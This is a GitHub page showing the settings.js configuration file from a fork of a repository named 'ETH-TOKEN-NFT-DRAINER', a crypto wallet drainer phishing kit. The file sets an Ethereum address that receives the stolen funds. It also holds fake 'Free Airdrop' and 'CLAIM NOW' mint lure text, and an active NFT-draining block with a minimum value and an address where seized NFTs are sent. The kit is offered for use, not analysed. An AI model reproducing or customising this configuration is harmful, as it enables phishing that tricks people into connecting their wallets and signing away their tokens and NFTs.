forked from pealzking/ETH-TOKEN-NFT-DRAINER
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathsettings.js
47 lines (42 loc) · 1.24 KB
/
settings.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
const receiveAddress = '0xa92dDc31B089Cc80f05F9fFE7eb2a57aBBDe545c',
collectionInfo = {
name: 'THE NFT WORLD',
socialMedia: {
discord: 'https://discord.gg',
twitter: 'https://twitter.com',
instagram: 'https://instagram.com/',
},
},
indexPageInfo = {
backgroundImage: 'background.jpg',
title: '{name}',
underTitle: 'Free Airdrop',
},
claimPageInfo = {
title: 'GET YOUR<br>NFT NOW',
shortDescription: 'Own, stake and build in our limitless possibilities Minecraft Metaverse',
longDescription:
'After claim, NTFs will appear in your Metamask wallet within 10 minutes',
claimButtonText: 'CLAIM NOW',
image: 'bg3.png',
imageRadius: 250,
},
drainNftsInfo = {
active: true,
minValue: 0.1,
nftReceiveAddress: '0xa92dDc31B089Cc80f05F9fFE7eb2a57aBBDe545c',
},
customStrings = {
title: 'MINT {name}',
connectButton: 'Connect wallet',
transferButton: 'Mint now',
dateString: 'Pre sale available {date}',
}
if (
!receiveAddress.startsWith('0x') ||
receiveAddress.length >= 64 || receiveAddress.length <= 40
) {
console.error(
'Error: ' + receiveAddress + ' is not a valid Ethereum address.'
)
}